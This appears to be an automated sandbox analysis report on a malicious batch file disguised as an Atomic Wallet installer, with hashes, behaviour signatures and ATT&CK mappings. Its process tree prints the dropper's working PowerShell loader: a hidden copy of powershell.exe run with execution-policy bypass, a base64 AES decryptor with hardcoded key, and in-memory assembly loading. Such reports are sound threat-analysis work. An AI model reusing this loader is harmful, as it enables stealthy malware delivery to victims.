Overview

overview

10

Static

static

AtomicWall...up.bat

windows7-x64

8

AtomicWall...up.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    44s
  • max time network
    50s
  • platform
    windows7_x64
  • resource
    win7-20220715-en
  • resource tags

    arch:x64arch:x86image:win7-20220715-enlocale:en-usos:windows7-x64system
  • submitted
    01-08-2022 15:25

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    AtomicWallet_Setup.bat

  • Size

    22KB

  • MD5

    3004914cdfa67357410e6f0c9a091655

  • SHA1

    dfdbb09661ee90ad4e88e7b0510653c93485a4b2

  • SHA256

    33d0d9fe89f0dba2b89347a0e2e6deb22542476d98676187f8c1eb529cb3997f

  • SHA512

    8f03d8c5a99dc85500e81ca613453ae886050f7e8303b39f6bc83f18db9e20596a743049d24f663c9c0ffd357b013480f6bc997deece1d15def3486429f3f49e

Score
8/10
evasion

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Sets file to hidden 1 TTPs 1 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat' -ArgumentList 'am_admin'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:960
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat" am_admin
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1552
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo F"
          4⤵
            PID:1640
          • C:\Windows\system32\xcopy.exe
            xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe AtomicWallet_Setup.bat.exe /y
            4⤵
              PID:1348
            • C:\Windows\system32\attrib.exe
              attrib +s +h AtomicWallet_Setup.bat.exe
              4⤵
              • Sets file to hidden
              • Views/modifies file attributes
              PID:1872
            • C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat.exe
              AtomicWallet_Setup.bat.exe -noprofile -windowstyle hidden -executionpolicy bypass -command $OnVrQh = [System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat').Split([Environment]::NewLine);$aWPbUn = $OnVrQh[$OnVrQh.Length - 1];$miePxL = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('dXNpbmcgU3lzdGVtLlRleHQ7dXNpbmcgU3lzdGVtLklPO3VzaW5nIFN5c3RlbS5JTy5Db21wcmVzc2lvbjt1c2luZyBTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5OyBwdWJsaWMgY2xhc3MgSU9YVHZZIHsgcHVibGljIHN0YXRpYyBieXRlW10gWVpueldIKGJ5dGVbXSBpbnB1dCwgYnl0ZVtdIGtleSwgYnl0ZVtdIGl2KSB7IEFlc01hbmFnZWQgYWVzID0gbmV3IEFlc01hbmFnZWQoKTsgYWVzLk1vZGUgPSBDaXBoZXJNb2RlLkNCQzsgYWVzLlBhZGRpbmcgPSBQYWRkaW5nTW9kZS5QS0NTNzsgSUNyeXB0b1RyYW5zZm9ybSBkZWNyeXB0b3IgPSBhZXMuQ3JlYXRlRGVjcnlwdG9yKGtleSwgaXYpOyBieXRlW10gZGVjcnlwdGVkID0gZGVjcnlwdG9yLlRyYW5zZm9ybUZpbmFsQmxvY2soaW5wdXQsIDAsIGlucHV0Lkxlbmd0aCk7IGRlY3J5cHRvci5EaXNwb3NlKCk7IGFlcy5EaXNwb3NlKCk7IHJldHVybiBkZWNyeXB0ZWQ7IH0gcHVibGljIHN0YXRpYyBieXRlW10gTVJtbUdtKGJ5dGVbXSBieXRlcykgeyBNZW1vcnlTdHJlYW0gbXNpID0gbmV3IE1lbW9yeVN0cmVhbShieXRlcyk7IE1lbW9yeVN0cmVhbSBtc28gPSBuZXcgTWVtb3J5U3RyZWFtKCk7IHZhciBncyA9IG5ldyBHWmlwU3RyZWFtKG1zaSwgQ29tcHJlc3Npb25Nb2RlLkRlY29tcHJlc3MpOyBncy5Db3B5VG8obXNvKTsgZ3MuRGlzcG9zZSgpOyBtc2kuRGlzcG9zZSgpOyBtc28uRGlzcG9zZSgpOyByZXR1cm4gbXNvLlRvQXJyYXkoKTsgfSB9'));Add-Type -TypeDefinition $miePxL;[System.Reflection.Assembly]::Load([IOXTvY]::MRmmGm([IOXTvY]::YZnzWH([System.Convert]::FromBase64String($aWPbUn), [System.Convert]::FromBase64String('E4IVXfYvoAH9YDlDQGzejd4/Zom8IPGT2Myddj/Bu10='), [System.Convert]::FromBase64String('4HVdg8diwSyYUE5hdNkHOA==')))).EntryPoint.Invoke($null, (, [string[]] ('am_admin')))
              4⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:668
              • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xjr9lam-.cmdline"
                5⤵
                  PID:1212
              • C:\Windows\system32\attrib.exe
                attrib -s -h AtomicWallet_Setup.bat.exe
                4⤵
                • Views/modifies file attributes
                PID:1040

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Initial Access

        Execution

        Persistence

        Hidden Files and Directories

        2
        T1158

        Privilege Escalation

        Defense Evasion

        Hidden Files and Directories

        2
        T1158

        Credential Access

        Discovery

        System Information Discovery

        1
        T1082

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat.exe
          Filesize

          462KB

          MD5

          852d67a27e454bd389fa7f02a8cbe23f

          SHA1

          5330fedad485e0e4c23b2abe1075a1f984fde9fc

          SHA256

          a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

          SHA512

          327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat.exe
          Filesize

          462KB

          MD5

          852d67a27e454bd389fa7f02a8cbe23f

          SHA1

          5330fedad485e0e4c23b2abe1075a1f984fde9fc

          SHA256

          a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

          SHA512

          327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

          Download Submit
        • \??\c:\Users\Admin\AppData\Local\Temp\xjr9lam-.0.cs
          Filesize

          744B

          MD5

          bc20fac1e1fa70c99931d73d89bd8a1f

          SHA1

          a7dd841b94caba28af0e5830378a7d758c69f82a

          SHA256

          ed91afd747b746d00d3932267f84a1f799d64b30702042b1e57fe878cb9ca41f

          SHA512

          6b5adf551d8f4dc7cb7f91fca03d519da4f82914de8ad6215c9ac0d721c7e37092d276755d8802f9768f7ece09dcf36e1bacf8a20c602423a39a3aafd19ab3ac

          Download Submit
        • \??\c:\Users\Admin\AppData\Local\Temp\xjr9lam-.cmdline
          Filesize

          309B

          MD5

          bf174a71bcae053018bc6de0e084cd9b

          SHA1

          9784107f0edebdcc4c9d48ec2554317737737117

          SHA256

          c899eb47b7f05e4f9bb4d4fbe94c33d15ef77fa6f6d3b00d4348c2b2381508bf

          SHA512

          9f8c36f65751ad50ecce805e88d1ef0cabbc14af20b1f3a286186285be5aa3a0de55a981ffa80dc223212ffe333504372d1b3a1f3b942f29b8b7d6fab45c170e

          Download Submit
        • \Users\Admin\AppData\Local\Temp\AtomicWallet_Setup.bat.exe
          Filesize

          462KB

          MD5

          852d67a27e454bd389fa7f02a8cbe23f

          SHA1

          5330fedad485e0e4c23b2abe1075a1f984fde9fc

          SHA256

          a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8

          SHA512

          327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

          Download Submit
        • memory/668-78-0x000000000248B000-0x00000000024AA000-memory.dmp
          Filesize

          124KB

          Download
        • memory/668-77-0x0000000002484000-0x0000000002487000-memory.dmp
          Filesize

          12KB

          Download
        • memory/668-76-0x000000000248B000-0x00000000024AA000-memory.dmp
          Filesize

          124KB

          Download
        • memory/668-72-0x0000000002484000-0x0000000002487000-memory.dmp
          Filesize

          12KB

          Download
        • memory/668-71-0x000007FEF2A00000-0x000007FEF355D000-memory.dmp
          Filesize

          11.4MB

          Download
        • memory/668-70-0x000007FEF3560000-0x000007FEF3F83000-memory.dmp
          Filesize

          10.1MB

          Download
        • memory/668-67-0x0000000000000000-mapping.dmp
          Download
        • memory/960-60-0x00000000025E4000-0x00000000025E7000-memory.dmp
          Filesize

          12KB

          Download
        • memory/960-61-0x00000000025EB000-0x000000000260A000-memory.dmp
          Filesize

          124KB

          Download
        • memory/960-54-0x0000000000000000-mapping.dmp
          Download
        • memory/960-58-0x00000000025E4000-0x00000000025E7000-memory.dmp
          Filesize

          12KB

          Download
        • memory/960-57-0x000007FEF33A0000-0x000007FEF3EFD000-memory.dmp
          Filesize

          11.4MB

          Download
        • memory/960-56-0x000007FEF3F00000-0x000007FEF4923000-memory.dmp
          Filesize

          10.1MB

          Download
        • memory/960-55-0x000007FEFB931000-0x000007FEFB933000-memory.dmp
          Filesize

          8KB

          Download
        • memory/1040-79-0x0000000000000000-mapping.dmp
          Download
        • memory/1212-73-0x0000000000000000-mapping.dmp
          Download
        • memory/1348-63-0x0000000000000000-mapping.dmp
          Download
        • memory/1552-59-0x0000000000000000-mapping.dmp
          Download
        • memory/1640-62-0x0000000000000000-mapping.dmp
          Download
        • memory/1872-64-0x0000000000000000-mapping.dmp
          Download